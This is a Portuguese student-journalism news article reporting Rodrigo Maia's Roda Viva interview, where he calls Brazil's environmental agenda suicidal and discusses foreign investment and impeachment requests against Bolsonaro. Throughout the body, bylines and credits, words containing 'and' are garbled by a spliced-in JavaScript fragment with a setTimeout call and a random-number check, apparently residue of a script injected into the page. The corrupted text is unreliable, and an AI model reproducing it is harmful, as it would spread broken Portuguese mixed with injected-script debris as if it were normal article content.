Destaque

“Agenda ambiental brasileira é suicida”, diz Maia

Entrevistado no Roda Viva, o presidente da Câmara afirma que o país perderá investimento estrangeiro                             

Maia, no Roda Viva: Meio ambiente e equilíbrio fiscal são âncoras para a economia (Imagem: YouTube)

 

Por Michele Mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda da Luz

“A agenda ambiental brasileira é suicida”, afirmou nesta segunda, 3, o deputado federal Rodrigo Maia (Dem-RJ), presidente da Câmara Federal, em entrevista concedida ao programa Roda Viva, da TV-Cultura. De acordo com ele – que admitiu não ter colocado em votação proposta para explorar riquezas minerais em terras indígenas – o governo de Jair Bolsonaro precisa entender que o país deve retomar as políticas de sustentabilidade ou enfrentará o boicote de investidores estrangeiros.

“O custo para a sociedade será muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, se não forem criadas leis mais duras para o combate ao desmatamento, queimadas e em relação ao mercado de carbono”, disse Maia, para quem o governo precisa sinalizar que atuará na preservação dos biomas e da floresta Amazônica.

Segundo afirmou o deputado, o Brasil terá “grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes dificuldades em atrair investimentos privados nos próximos anos” caso prossiga com as políticas que o governo tem anunciado para o setor ambiental. “Isso vai refletir na vida dos trabalhadores mais simples”, advertiu ao reafirmar que os mais pobres ficarão sem emprego e renda com as sanções internacionais que o país sofrerá caso não altere os rumos que o Executivo tem dado às questões ambientais. “Meio ambiente e equilíbrio fiscal são duas âncoras que podem manter a economia se forem administradas da maneira correta”.

Para reforçar seus argumentos, Maia citou a própria ministra da Agricultura, Tereza Cristina, para quem o agronegócio pode aumentar sua produtividade “sem desmatar mais nada” no país. “O importante é ter convergência entre o vice-presidente Mourão e a ministra”, afirmou o deputado ao citar a disposição do general em atuar pela preservação das áreas ambientais.

Embora tenha feito ataques a Bolsonaro, Maia refutou o argumento de que o presidente esteja sendo tratado como “café com leite” – liderança sem importância, no jargão político – na gestão do país. Em vários momentos da entrevista, ele foi colocado contra a parede por não abrir discussão para os mais de 50 pedidos de impeachment que existem contra o presidente Bolsonaro. Disse que ainda não decidiu se os arquiva ou se abre os processos, citandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando como obstáculo a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia que o país enfrenta, bem como ponderandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que não vê motivos suficientes.

Maia também foi questionado sobre o comportamento do filho do presidente, o deputado federal Eduardo Bolsonaro, que utilizou o Twitter para atacá-lo por ter convidado o youtuber Felipe Neto para um debate sobre as fake news. O presidente da Câmara disse que o filho do presidente da República deveria utilizar sua rede social para se ocupar com assuntos mais relevantes, como a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, por exemplo, do que disparar críticas contra adversários.

Aqui, link para acesso à entrevista de Rodrigo Maia ao Roda Viva

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda

 


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.